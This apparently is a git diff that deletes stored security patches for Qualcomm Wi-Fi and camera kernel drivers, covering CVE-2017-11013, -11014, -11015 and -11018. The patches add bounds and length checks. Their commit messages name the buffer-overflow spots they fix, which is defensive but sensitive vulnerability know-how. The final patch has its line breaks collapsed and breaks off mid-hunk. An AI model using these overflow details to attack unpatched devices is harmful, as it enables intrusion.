diff --git a/Patches/Linux_CVEs/CVE-2017-11013/qcacld-3.0/0003.patch b/Patches/Linux_CVEs/CVE-2017-11013/qcacld-3.0/0003.patch
deleted file mode 100644
index eca9ffd7..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11013/qcacld-3.0/0003.patch
+++ /dev/null
@@ -1,98 +0,0 @@
-From c9f8654b11a1e693022ad7f163b3bc477fea8ce8 Mon Sep 17 00:00:00 2001
-From: Naveen Rawat
-Date: Fri, 9 Jun 2017 14:25:45 -0700
-Subject: qcacld-3.0: Skip an IE if found more its max times in a frame
-
-Check if a IE has been encountered more than max possible for that IE
-while parsing a frame.
-
-Change-Id: I1054c7df18780469849be55fc4343f09ac502a49
-CRs-Fixed: 2058261
----
- core/mac/src/include/dot11f.h | 4 ++--
- core/mac/src/sys/legacy/src/utils/src/dot11f.c | 25 +++++++++++++------------
- 2 files changed, 15 insertions(+), 14 deletions(-)
-
-diff --git a/core/mac/src/include/dot11f.h b/core/mac/src/include/dot11f.h
-index 96b8c6c..c5be2fd 100644
---- a/core/mac/src/include/dot11f.h
-+++ b/core/mac/src/include/dot11f.h
-@@ -35,7 +35,7 @@
- *
- *
- * This file was automatically generated by 'framesc'
-- * Mon Mar 13 16:17:19 2017 from the following file(s):
-+ * Fri Jun 9 14:23:47 2017 from the following file(s):
- *
- * dot11f.frms
- *
-@@ -88,8 +88,8 @@ typedef uint32_t tDOT11F_U64[2];
- #define DOT11F_BUFFER_OVERFLOW (0x10000005)
- #define DOT11F_MANDATORY_TLV_MISSING (0x00001000)
- #define DOT11F_FAILED(code) ((code) & 0x10000000)
--#define DOT11F_WARNED(code) (((0 == (code)) & 0x10000000) && code)
- #define DOT11F_SUCCEEDED(code) ((code) == 0)
-+#define DOT11F_WARNED(code) (!DOT11F_SUCCEEDED(code) && !DOT11F_FAILED(code))
-
- /*********************************************************************
- * Fixed Fields *
-diff --git a/core/mac/src/sys/legacy/src/utils/src/dot11f.c b/core/mac/src/sys/legacy/src/utils/src/dot11f.c
-index 210cf89..a6089b3 100644
---- a/core/mac/src/sys/legacy/src/utils/src/dot11f.c
-+++ b/core/mac/src/sys/legacy/src/utils/src/dot11f.c
-@@ -33,7 +33,7 @@
- *
- *
- * This file was automatically generated by 'framesc'
-- * Mon Mar 13 16:17:19 2017 from the following file(s):
-+ * Fri Jun 9 14:23:47 2017 from the following file(s):
- *
- * dot11f.frms
- *
-@@ -9240,6 +9240,10 @@ static uint32_t unpack_core(tpAniSirGlobal pCtx,
-
- countOffset = ((0 != pIe->arraybound) *
- (*(uint16_t *)(pFrm + pIe->countOffset)));
-+ if (0 != pIe->arraybound && countOffset >= pIe->arraybound) {
-+ status |= DOT11F_DUPLICATE_IE;
-+ goto skip_dup_ie;
-+ }
- switch (pIe->sig) {
- case SigIeGTK:
- status |=
-@@ -9819,17 +9823,13 @@ static uint32_t unpack_core(tpAniSirGlobal pCtx,
- countOffset));
- break;
- case SigIeNeighborReport:
-- if (countOffset < MAX_SUPPORTED_NEIGHBOR_RPT) {
-- status |=
-- dot11f_unpack_ie_neighbor_report(
-- pCtx, pBufRemaining, len,
-- (tDot11fIENeighborReport *)
-- (pFrm + pIe->offset +
-- sizeof(tDot11fIENeighborReport) *
-- countOffset));
-- } else {
-- status |= DOT11F_BUFFER_OVERFLOW;
-- }
-+ status |=
-+ dot11f_unpack_ie_neighbor_report(
-+ pCtx, pBufRemaining, len,
-+ (tDot11fIENeighborReport *)
-+ (pFrm + pIe->offset +
-+ sizeof(tDot11fIENeighborReport) *
-+ countOffset));
- break;
- case SigIeOBSSScanParameters:
- status |=
-@@ -10427,6 +10427,7 @@ static uint32_t unpack_core(tpAniSirGlobal pCtx,
- status |= DOT11F_UNKNOWN_IES;
- }
-
-+skip_dup_ie:
- pBufRemaining += len;
-
- if (len > nBufRemaining) {
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11014/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-11014/qcacld-2.0/0001.patch
deleted file mode 100644
index 8dab716a..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11014/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,49 +0,0 @@
-From adb96af5b080dfe4ee29961a17ed3f04c87d5519 Mon Sep 17 00:00:00 2001
-From: Srinivas Girigowda
-Date: Mon, 21 Aug 2017 16:56:01 -0700
-Subject: [PATCH] qcacld-2.0: Add bound check before writing to channel list
-
-qcacld-3.0 to qcacld-2.0 propagation
-
-In function rrm_process_beacon_report_req, add bound check before
-writing to channel list which is of fixed size.
-
-Change-Id: I3c80974bba84a96f7b85e4ce62bbb01c23b4babf
-CRs-Fixed: 2060138
-Bug: 64438727
-Signed-off-by: Srinivas Girigowda
----
- drivers/staging/qcacld-2.0/CORE/MAC/src/pe/rrm/rrmApi.c | 17 ++++++++++++-----
- 1 file changed, 12 insertions(+), 5 deletions(-)
-
-diff --git a/drivers/staging/qcacld-2.0/CORE/MAC/src/pe/rrm/rrmApi.c b/drivers/staging/qcacld-2.0/CORE/MAC/src/pe/rrm/rrmApi.c
-index 3fb65c45c2925..ddf22cd957db2 100644
---- a/drivers/staging/qcacld-2.0/CORE/MAC/src/pe/rrm/rrmApi.c
-+++ b/drivers/staging/qcacld-2.0/CORE/MAC/src/pe/rrm/rrmApi.c
-@@ -628,14 +628,21 @@ rrmProcessBeaconReportReq( tpAniSirGlobal pMac,
- pSmeBcnReportReq->channelList.numChannels = num_channels;
- if( pBeaconReq->measurement_request.Beacon.num_APChannelReport )
- {
-- tANI_U8 *pChanList = pSmeBcnReportReq->channelList.channelNumber;
-+ tANI_U8 *ch_lst = pSmeBcnReportReq->channelList.channelNumber;
-+ uint8_t len;
-+ uint16_t ch_ctr = 0;
- for( num_APChanReport = 0 ; num_APChanReport < pBeaconReq->measurement_request.Beacon.num_APChannelReport ; num_APChanReport++ )
- {
-- vos_mem_copy(pChanList,
-- pBeaconReq->measurement_request.Beacon.APChannelReport[num_APChanReport].channelList,
-- pBeaconReq->measurement_request.Beacon.APChannelReport[num_APChanReport].num_channelList);
-+ len = pBeaconReq->measurement_request.Beacon.
-+ APChannelReport[num_APChanReport].num_channelList;
-+ if(ch_ctr + len > sizeof(pSmeBcnReportReq->channelList.channelNumber))
-+ break;
-+
-+ vos_mem_copy(&ch_lst[ch_ctr],
-+ pBeaconReq->measurement_request.Beacon.
-+ APChannelReport[num_APChanReport].channelList, len);
-
-- pChanList += pBeaconReq->measurement_request.Beacon.APChannelReport[num_APChanReport].num_channelList;
-+ ch_ctr += len;
- }
- }
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11014/qcacld-3.0/0002.patch b/Patches/Linux_CVEs/CVE-2017-11014/qcacld-3.0/0002.patch
deleted file mode 100644
index 4a03b1cb..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11014/qcacld-3.0/0002.patch
+++ /dev/null
@@ -1,53 +0,0 @@
-From ec58bc99e29d89f8e164954999ef8a45cec21754 Mon Sep 17 00:00:00 2001
-From: Krishna Kumaar Natarajan
-Date: Wed, 5 Jul 2017 16:47:45 -0700
-Subject: qcacld-3.0: Update lim_compute_crc32() to pass uint16_t
-
-Update lim_compute_crc32() to pass uint16_t as a length type.
-Currently uint8_t is being passed as length and there will be type
-mismatch when authentication frame to be encrypted will be larger
-than 255 bytes.
-
-Change-Id: Ic009197c13a2d70c9015a184acff2e82bf80eaba
-CRs-Fixed: 2060959
----
- core/mac/src/pe/lim/lim_security_utils.c | 2 +-
- core/mac/src/pe/lim/lim_security_utils.h | 4 ++--
- 2 files changed, 3 insertions(+), 3 deletions(-)
-
-diff --git a/core/mac/src/pe/lim/lim_security_utils.c b/core/mac/src/pe/lim/lim_security_utils.c
-index c5938c2..1a2964c 100644
---- a/core/mac/src/pe/lim/lim_security_utils.c
-+++ b/core/mac/src/pe/lim/lim_security_utils.c
-@@ -596,7 +596,7 @@ lim_encrypt_auth_frame(tpAniSirGlobal pMac, uint8_t keyId, uint8_t *pKey,
- * @return None
- */
-
--void lim_compute_crc32(uint8_t *pDest, uint8_t *pSrc, uint8_t len)
-+void lim_compute_crc32(uint8_t *pDest, uint8_t *pSrc, uint16_t len)
- {
- uint32_t crc;
- int i;
-diff --git a/core/mac/src/pe/lim/lim_security_utils.h b/core/mac/src/pe/lim/lim_security_utils.h
-index c5b30ba..c3410ea 100644
---- a/core/mac/src/pe/lim/lim_security_utils.h
-+++ b/core/mac/src/pe/lim/lim_security_utils.h
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2011-2015 The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2011-2015, 2017 The Linux Foundation. All rights reserved.
- *
- * Previously licensed under the ISC license by Qualcomm Atheros, Inc.
- *
-@@ -58,7 +58,7 @@ void lim_restore_from_auth_state(tpAniSirGlobal,
- uint8_t lim_delete_open_auth_pre_auth_node(tpAniSirGlobal mac_ctx);
-
- /* Encryption/Decryption related functions */
--void lim_compute_crc32(uint8_t *, uint8_t *, uint8_t);
-+void lim_compute_crc32(uint8_t *, uint8_t *, uint16_t);
- void lim_rc4(uint8_t *, uint8_t *, uint8_t *, uint32_t, uint16_t);
- void lim_encrypt_auth_frame(tpAniSirGlobal, uint8_t, uint8_t *, uint8_t *,
- uint8_t *, uint32_t);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11015/prima/0001.patch b/Patches/Linux_CVEs/CVE-2017-11015/prima/0001.patch
deleted file mode 100644
index d54a44b4..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11015/prima/0001.patch
+++ /dev/null
@@ -1,52 +0,0 @@
-From ac39bfffe109a6cffcaf3b537505130712161dce Mon Sep 17 00:00:00 2001
-From: Sridhar Selvaraj
-Date: Fri, 14 Jul 2017 16:08:23 +0530
-Subject: [PATCH] qcacld-2.0: Update limComputeCrc32 to pass uint16_t
-
-qcacld-3.0 to qcacld-2.0 propagation
-
-Update limComputeCrc32() to pass uint16_t as a length type.
-Currently uint8_t is being passed as length and there will be type
-mismatch when authentication frame to be encrypted will be larger
-than 255 bytes.
-
-Change-Id: Ic009197c13a2d70c9015a184acff2e82bf80eaba
-CRs-Fixed: 2072937
----
- drivers/staging/prima/CORE/MAC/src/pe/lim/limSecurityUtils.c | 2 +-
- drivers/staging/prima/CORE/MAC/src/pe/lim/limSecurityUtils.h | 4 ++--
- 2 files changed, 3 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/staging/prima/CORE/MAC/src/pe/lim/limSecurityUtils.c b/drivers/staging/prima/CORE/MAC/src/pe/lim/limSecurityUtils.c
-index 85f12dfb876..8f754c77e9f 100644
---- a/drivers/staging/prima/CORE/MAC/src/pe/lim/limSecurityUtils.c
-+++ b/drivers/staging/prima/CORE/MAC/src/pe/lim/limSecurityUtils.c
-@@ -609,7 +609,7 @@ limEncryptAuthFrame(tpAniSirGlobal pMac, tANI_U8 keyId, tANI_U8 *pKey, tANI_U8 *
- */
-
- void
--limComputeCrc32(tANI_U8 *pDest, tANI_U8 * pSrc, tANI_U8 len)
-+limComputeCrc32(tANI_U8 *pDest, tANI_U8 * pSrc, tANI_U16 len)
- {
- tANI_U32 crc;
- int i;
-diff --git a/drivers/staging/prima/CORE/MAC/src/pe/lim/limSecurityUtils.h b/drivers/staging/prima/CORE/MAC/src/pe/lim/limSecurityUtils.h
-index 5eafbd7b747..dd097607a18 100644
---- a/drivers/staging/prima/CORE/MAC/src/pe/lim/limSecurityUtils.h
-+++ b/drivers/staging/prima/CORE/MAC/src/pe/lim/limSecurityUtils.h
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2012-2013, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2011-2015, 2017 The Linux Foundation. All rights reserved.
- *
- * Previously licensed under the ISC license by Qualcomm Atheros, Inc.
- *
-@@ -73,7 +73,7 @@ void limRestoreFromAuthState(tpAniSirGlobal,
-
- // Encryption/Decryption related functions
- tCfgWepKeyEntry *limLookUpKeyMappings(tSirMacAddr);
--void limComputeCrc32(tANI_U8 *, tANI_U8 *, tANI_U8);
-+void limComputeCrc32(tANI_U8 *, tANI_U8 *, tANI_U16);
- void limRC4(tANI_U8 *, tANI_U8 *, tANI_U8 *, tANI_U32, tANI_U16);
- void limEncryptAuthFrame(tpAniSirGlobal, tANI_U8, tANI_U8 *, tANI_U8 *, tANI_U8 *, tANI_U32);
- tANI_U8 limDecryptAuthFrame(tpAniSirGlobal, tANI_U8 *, tANI_U8 *, tANI_U8 *, tANI_U32, tANI_U16);
diff --git a/Patches/Linux_CVEs/CVE-2017-11015/prima/0002.patch b/Patches/Linux_CVEs/CVE-2017-11015/prima/0002.patch
deleted file mode 100644
index dd125558..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11015/prima/0002.patch
+++ /dev/null
@@ -1,33 +0,0 @@
-From d0cd3ede7c17ee7fcf0f9b6d125d027bc28640be Mon Sep 17 00:00:00 2001
-From: Sridhar Selvaraj
-Date: Fri, 14 Jul 2017 15:53:09 +0530
-Subject: [PATCH] qcacld-2.0: Update SIR_MAC_AUTH_CHALLENGE_LENGTH as per IEEE
- spec
-
-qcacld-3.0 to qcacld-2.0 propagation
-
-Update SIR_MAC_AUTH_CHALLENGE_LENGTH to 253 as per IEEE spec.
-Currently value of SIR_MAC_AUTH_CHALLENGE_LENGTH is set to 128.
-This may result in potential buffer overflow since frame parser
-allows challenge text of length upto 253 but driver can not handle
-challenge text longer than 128 bytes.
-
-Change-Id: I7baf860fdde51a14a6573b4f0f26817f5071193e
-CRs-Fixed: 2072937
----
- drivers/staging/prima/CORE/MAC/inc/sirMacProtDef.h | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/drivers/staging/prima/CORE/MAC/inc/sirMacProtDef.h b/drivers/staging/prima/CORE/MAC/inc/sirMacProtDef.h
-index cd548457338..7ee9a613e64 100644
---- a/drivers/staging/prima/CORE/MAC/inc/sirMacProtDef.h
-+++ b/drivers/staging/prima/CORE/MAC/inc/sirMacProtDef.h
-@@ -579,7 +579,7 @@
- #define SIR_MAC_MAX_NUMBER_OF_RATES 12
- #define SIR_MAC_MAX_NUM_OF_DEFAULT_KEYS 4
- #define SIR_MAC_KEY_LENGTH 13 // WEP Maximum key length size
--#define SIR_MAC_AUTH_CHALLENGE_LENGTH 128
-+#define SIR_MAC_AUTH_CHALLENGE_LENGTH 253
- #define SIR_MAC_WEP_IV_LENGTH 4
- #define SIR_MAC_WEP_ICV_LENGTH 4
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11015/qcacld-2.0/0003.patch b/Patches/Linux_CVEs/CVE-2017-11015/qcacld-2.0/0003.patch
deleted file mode 100644
index f881cb1d..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11015/qcacld-2.0/0003.patch
+++ /dev/null
@@ -1,54 +0,0 @@
-From d7285900f6fa28b0be51f5d18c52bd06385f8aee Mon Sep 17 00:00:00 2001
-From: Srinivas Girigowda
-Date: Mon, 21 Aug 2017 18:23:29 -0700
-Subject: [PATCH] qcacld-2.0: Update limComputeCrc32 to pass uint16_t
-
-qcacld-3.0 to qcacld-2.0 propagation
-
-Update limComputeCrc32() to pass uint16_t as a length type.
-Currently uint8_t is being passed as length and there will be type
-mismatch when authentication frame to be encrypted will be larger
-than 255 bytes.
-
-Change-Id: Ic009197c13a2d70c9015a184acff2e82bf80eaba
-CRs-Fixed: 2072937
-Bug: 64438728
-Signed-off-by: Srinivas Girigowda
----
- drivers/staging/qcacld-2.0/CORE/MAC/src/pe/lim/limSecurityUtils.c | 2 +-
- drivers/staging/qcacld-2.0/CORE/MAC/src/pe/lim/limSecurityUtils.h | 4 ++--
- 2 files changed, 3 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/staging/qcacld-2.0/CORE/MAC/src/pe/lim/limSecurityUtils.c b/drivers/staging/qcacld-2.0/CORE/MAC/src/pe/lim/limSecurityUtils.c
-index 0241dc010adce..049c86aa55f78 100644
---- a/drivers/staging/qcacld-2.0/CORE/MAC/src/pe/lim/limSecurityUtils.c
-+++ b/drivers/staging/qcacld-2.0/CORE/MAC/src/pe/lim/limSecurityUtils.c
-@@ -647,7 +647,7 @@ limEncryptAuthFrame(tpAniSirGlobal pMac, tANI_U8 keyId, tANI_U8 *pKey, tANI_U8 *
- */
-
- void
--limComputeCrc32(tANI_U8 *pDest, tANI_U8 * pSrc, tANI_U8 len)
-+limComputeCrc32(tANI_U8 *pDest, tANI_U8 * pSrc, tANI_U16 len)
- {
- tANI_U32 crc;
- int i;
-diff --git a/drivers/staging/qcacld-2.0/CORE/MAC/src/pe/lim/limSecurityUtils.h b/drivers/staging/qcacld-2.0/CORE/MAC/src/pe/lim/limSecurityUtils.h
-index 4ede5005b556f..9139ce20f3b4c 100644
---- a/drivers/staging/qcacld-2.0/CORE/MAC/src/pe/lim/limSecurityUtils.h
-+++ b/drivers/staging/qcacld-2.0/CORE/MAC/src/pe/lim/limSecurityUtils.h
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2011-2015 The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2011-2015, 2017 The Linux Foundation. All rights reserved.
- *
- * Previously licensed under the ISC license by Qualcomm Atheros, Inc.
- *
-@@ -59,7 +59,7 @@ tANI_U8 limDeleteOpenAuthPreAuthNode(tpAniSirGlobal pMac);
-
- // Encryption/Decryption related functions
- tCfgWepKeyEntry *limLookUpKeyMappings(tSirMacAddr);
--void limComputeCrc32(tANI_U8 *, tANI_U8 *, tANI_U8);
-+void limComputeCrc32(tANI_U8 *, tANI_U8 *, tANI_U16);
- void limRC4(tANI_U8 *, tANI_U8 *, tANI_U8 *, tANI_U32, tANI_U16);
- void limEncryptAuthFrame(tpAniSirGlobal, tANI_U8, tANI_U8 *, tANI_U8 *, tANI_U8 *, tANI_U32);
- tANI_U8 limDecryptAuthFrame(tpAniSirGlobal, tANI_U8 *, tANI_U8 *, tANI_U8 *, tANI_U32, tANI_U16);
diff --git a/Patches/Linux_CVEs/CVE-2017-11015/qcacld-2.0/0004.patch b/Patches/Linux_CVEs/CVE-2017-11015/qcacld-2.0/0004.patch
deleted file mode 100644
index 18aee47d..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11015/qcacld-2.0/0004.patch
+++ /dev/null
@@ -1,35 +0,0 @@
-From a50ca3ce494ab6bb6b2e37cdd0428aa6d6260bef Mon Sep 17 00:00:00 2001
-From: Srinivas Girigowda
-Date: Mon, 21 Aug 2017 21:25:55 -0700
-Subject: [PATCH] qcacld-2.0: Update SIR_MAC_AUTH_CHALLENGE_LENGTH as per IEEE
- spec
-
-qcacld-3.0 to qcacld-2.0 propagation
-
-Update SIR_MAC_AUTH_CHALLENGE_LENGTH to 253 as per IEEE spec.
-Currently value of SIR_MAC_AUTH_CHALLENGE_LENGTH is set to 128.
-This may result in potential buffer overflow since frame parser
-allows challenge text of length upto 253 but driver can not handle
-challenge text longer than 128 bytes.
-
-Change-Id: I7baf860fdde51a14a6573b4f0f26817f5071193e
-CRs-Fixed: 2072937
-Bug: 64438728
-Signed-off-by: Srinivas Girigowda
----
- drivers/staging/qcacld-2.0/CORE/MAC/inc/sirMacProtDef.h | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/drivers/staging/qcacld-2.0/CORE/MAC/inc/sirMacProtDef.h b/drivers/staging/qcacld-2.0/CORE/MAC/inc/sirMacProtDef.h
-index bb43167c255cc..c5d8ad5dbcbc0 100644
---- a/drivers/staging/qcacld-2.0/CORE/MAC/inc/sirMacProtDef.h
-+++ b/drivers/staging/qcacld-2.0/CORE/MAC/inc/sirMacProtDef.h
-@@ -584,7 +584,7 @@
- #define SIR_MAC_MAX_NUMBER_OF_RATES 12
- #define SIR_MAC_MAX_NUM_OF_DEFAULT_KEYS 4
- #define SIR_MAC_KEY_LENGTH 13 // WEP Maximum key length size
--#define SIR_MAC_AUTH_CHALLENGE_LENGTH 128
-+#define SIR_MAC_AUTH_CHALLENGE_LENGTH 253
- #define SIR_MAC_WEP_IV_LENGTH 4
- #define SIR_MAC_WEP_ICV_LENGTH 4
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11015/qcacld-3.0/0005.patch b/Patches/Linux_CVEs/CVE-2017-11015/qcacld-3.0/0005.patch
deleted file mode 100644
index 4a03b1cb..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11015/qcacld-3.0/0005.patch
+++ /dev/null
@@ -1,53 +0,0 @@
-From ec58bc99e29d89f8e164954999ef8a45cec21754 Mon Sep 17 00:00:00 2001
-From: Krishna Kumaar Natarajan
-Date: Wed, 5 Jul 2017 16:47:45 -0700
-Subject: qcacld-3.0: Update lim_compute_crc32() to pass uint16_t
-
-Update lim_compute_crc32() to pass uint16_t as a length type.
-Currently uint8_t is being passed as length and there will be type
-mismatch when authentication frame to be encrypted will be larger
-than 255 bytes.
-
-Change-Id: Ic009197c13a2d70c9015a184acff2e82bf80eaba
-CRs-Fixed: 2060959
----
- core/mac/src/pe/lim/lim_security_utils.c | 2 +-
- core/mac/src/pe/lim/lim_security_utils.h | 4 ++--
- 2 files changed, 3 insertions(+), 3 deletions(-)
-
-diff --git a/core/mac/src/pe/lim/lim_security_utils.c b/core/mac/src/pe/lim/lim_security_utils.c
-index c5938c2..1a2964c 100644
---- a/core/mac/src/pe/lim/lim_security_utils.c
-+++ b/core/mac/src/pe/lim/lim_security_utils.c
-@@ -596,7 +596,7 @@ lim_encrypt_auth_frame(tpAniSirGlobal pMac, uint8_t keyId, uint8_t *pKey,
- * @return None
- */
-
--void lim_compute_crc32(uint8_t *pDest, uint8_t *pSrc, uint8_t len)
-+void lim_compute_crc32(uint8_t *pDest, uint8_t *pSrc, uint16_t len)
- {
- uint32_t crc;
- int i;
-diff --git a/core/mac/src/pe/lim/lim_security_utils.h b/core/mac/src/pe/lim/lim_security_utils.h
-index c5b30ba..c3410ea 100644
---- a/core/mac/src/pe/lim/lim_security_utils.h
-+++ b/core/mac/src/pe/lim/lim_security_utils.h
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2011-2015 The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2011-2015, 2017 The Linux Foundation. All rights reserved.
- *
- * Previously licensed under the ISC license by Qualcomm Atheros, Inc.
- *
-@@ -58,7 +58,7 @@ void lim_restore_from_auth_state(tpAniSirGlobal,
- uint8_t lim_delete_open_auth_pre_auth_node(tpAniSirGlobal mac_ctx);
-
- /* Encryption/Decryption related functions */
--void lim_compute_crc32(uint8_t *, uint8_t *, uint8_t);
-+void lim_compute_crc32(uint8_t *, uint8_t *, uint16_t);
- void lim_rc4(uint8_t *, uint8_t *, uint8_t *, uint32_t, uint16_t);
- void lim_encrypt_auth_frame(tpAniSirGlobal, uint8_t, uint8_t *, uint8_t *,
- uint8_t *, uint32_t);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11015/qcacld-3.0/0006.patch b/Patches/Linux_CVEs/CVE-2017-11015/qcacld-3.0/0006.patch
deleted file mode 100644
index 5ceaaed6..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11015/qcacld-3.0/0006.patch
+++ /dev/null
@@ -1,33 +0,0 @@
-From 1ef6add65a36de6c4da788f776de2b5b5c528d8e Mon Sep 17 00:00:00 2001
-From: Krishna Kumaar Natarajan
-Date: Wed, 5 Jul 2017 16:38:54 -0700
-Subject: qcacld-3.0: Update SIR_MAC_AUTH_CHALLENGE_LENGTH as per IEEE spec
-
-Update SIR_MAC_AUTH_CHALLENGE_LENGTH to 253 as per IEEE spec.
-Currently value of SIR_MAC_AUTH_CHALLENGE_LENGTH is set to 128.
-This may result in potential buffer overflow since frame parser
-allows challenge text of length upto 253 but driver can not handle
-challenge text longer than 128 bytes.
-
-Change-Id: I7baf860fdde51a14a6573b4f0f26817f5071193e
-CRs-Fixed: 2060959
----
- core/mac/inc/sir_mac_prot_def.h | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/core/mac/inc/sir_mac_prot_def.h b/core/mac/inc/sir_mac_prot_def.h
-index fbbd37e..be47e13 100644
---- a/core/mac/inc/sir_mac_prot_def.h
-+++ b/core/mac/inc/sir_mac_prot_def.h
-@@ -554,7 +554,7 @@
- #define SIR_MAC_MAX_NUMBER_OF_RATES 12
- #define SIR_MAC_MAX_NUM_OF_DEFAULT_KEYS 4
- #define SIR_MAC_KEY_LENGTH 13 /* WEP Maximum key length size */
--#define SIR_MAC_AUTH_CHALLENGE_LENGTH 128
-+#define SIR_MAC_AUTH_CHALLENGE_LENGTH 253
- #define SIR_MAC_WEP_IV_LENGTH 4
- #define SIR_MAC_WEP_ICV_LENGTH 4
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-11018/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-11018/ANY/0001.patch
deleted file mode 100644
index 95654041..00000000
--- a/Patches/Linux_CVEs/CVE-2017-11018/ANY/0001.patch
+++ /dev/null
@@ -1,531 +0,0 @@ -From 1d718286c4c482502a2c4356cebef28aef2fb01f Mon Sep 17 00:00:00 2001 -From: Rahul Sharma -Date: Wed, 28 Jun 2017 15:46:19 +0530 -Subject: msm: vfe : Fix for multiple buffer over read/write - -Implemented validation of user space values in ioctl call -before processing buffers in response to user commands. - -Change-Id: Icf6e49650bab358b764ebf1db24925a4063c5842 -Signed-off-by: Rahul Sharma ---- - drivers/media/video/msm/vfe/msm_vfe32.c | 246 ++++++++++++++++++++++++++++++++ - 1 file changed, 246 insertions(+) - -diff --git a/drivers/media/video/msm/vfe/msm_vfe32.c b/drivers/media/video/msm/vfe/msm_vfe32.c -index 64f3e7b..1509a04 100644 ---- a/drivers/media/video/msm/vfe/msm_vfe32.c -+++ b/drivers/media/video/msm/vfe/msm_vfe32.c -@@ -2275,6 +2275,7 @@ static int vfe32_proc_general( - uint32_t *cmdp_local = NULL; - uint32_t snapshot_cnt = 0; - uint32_t temp1 = 0, temp2 = 0; -+ uint32_t maxvalue = 0; - struct msm_camera_vfe_params_t vfe_params; - - switch (cmd->id) { -@@ -2373,6 +2374,14 @@ static int vfe32_proc_general( - __func__); - goto proc_general_done; - } -+ if (cmd->id < 0 || cmd->id >= ARRAY_SIZE(vfe32_cmd)) { -+ rc = -EINVAL; -+ goto proc_general_done; -+ } -+ if (cmd->length < vfe32_cmd[cmd->id].length) { -+ rc = -EINVAL; -+ goto proc_general_done; -+ } - cmdp = kmalloc(cmd->length, GFP_ATOMIC); - if (!cmdp) { - rc = -ENOMEM; -@@ -2407,6 +2416,14 @@ static int vfe32_proc_general( - __func__); - goto proc_general_done; - } -+ if (cmd->id < 0 || cmd->id >= ARRAY_SIZE(vfe32_cmd)) { -+ rc = -EINVAL; -+ goto proc_general_done; -+ } -+ if (cmd->length < vfe32_cmd[cmd->id].length) { -+ rc = -EINVAL; -+ goto proc_general_done; -+ } - cmdp = kmalloc(cmd->length, GFP_ATOMIC); - if (!cmdp) { - rc = -ENOMEM; -@@ -2441,6 +2458,14 @@ static int vfe32_proc_general( - __func__); - goto proc_general_done; - } -+ if (cmd->id < 0 || cmd->id >= ARRAY_SIZE(vfe32_cmd)) { -+ rc = -EINVAL; -+ goto proc_general_done; -+ } -+ if (cmd->length < 
vfe32_cmd[cmd->id].length) { -+ rc = -EINVAL; -+ goto proc_general_done; -+ } - cmdp = kmalloc(cmd->length, GFP_ATOMIC); - if (!cmdp) { - rc = -ENOMEM; -@@ -2471,6 +2496,14 @@ static int vfe32_proc_general( - __func__); - goto proc_general_done; - } -+ if (cmd->id < 0 || cmd->id >= ARRAY_SIZE(vfe32_cmd)) { -+ rc = -EINVAL; -+ goto proc_general_done; -+ } -+ if (cmd->length < vfe32_cmd[cmd->id].length) { -+ rc = -EINVAL; -+ goto proc_general_done; -+ } - cmdp = kmalloc(cmd->length, GFP_ATOMIC); - if (!cmdp) { - rc = -ENOMEM; -@@ -2502,6 +2535,14 @@ static int vfe32_proc_general( - __func__); - goto proc_general_done; - } -+ if (cmd->id < 0 || cmd->id >= ARRAY_SIZE(vfe32_cmd)) { -+ rc = -EINVAL; -+ goto proc_general_done; -+ } -+ if (cmd->length < vfe32_cmd[cmd->id].length) { -+ rc = -EINVAL; -+ goto proc_general_done; -+ } - cmdp = kmalloc(cmd->length, GFP_ATOMIC); - if (!cmdp) { - rc = -ENOMEM; -@@ -2527,6 +2568,14 @@ static int vfe32_proc_general( - __func__); - goto proc_general_done; - } -+ if (cmd->id < 0 || cmd->id >= ARRAY_SIZE(vfe32_cmd)) { -+ rc = -EINVAL; -+ goto proc_general_done; -+ } -+ if (cmd->length < vfe32_cmd[cmd->id].length) { -+ rc = -EINVAL; -+ goto proc_general_done; -+ } - cmdp = kmalloc(cmd->length, GFP_ATOMIC); - if (!cmdp) { - rc = -ENOMEM; -@@ -2589,6 +2638,14 @@ static int vfe32_proc_general( - VFE_STATS_CFG); - msm_camera_io_w(module_val, - vfe32_ctrl->share_ctrl->vfebase + VFE_MODULE_CFG); -+ if (cmd->id < 0 || cmd->id >= ARRAY_SIZE(vfe32_cmd)) { -+ rc = -EINVAL; -+ goto proc_general_done; -+ } -+ if (cmd->length < vfe32_cmd[cmd->id].length) { -+ rc = -EINVAL; -+ goto proc_general_done; -+ } - cmdp = kmalloc(cmd->length, GFP_ATOMIC); - if (!cmdp) { - rc = -ENOMEM; -@@ -2627,6 +2684,10 @@ static int vfe32_proc_general( - new_val = *cmdp_local; - old_val &= MCE_EN_MASK; - new_val = new_val | old_val; -+ if (cmd->length < 4) { -+ rc = -EINVAL; -+ goto proc_general_done; -+ } - msm_camera_io_memcpy( - vfe32_ctrl->share_ctrl->vfebase + - 
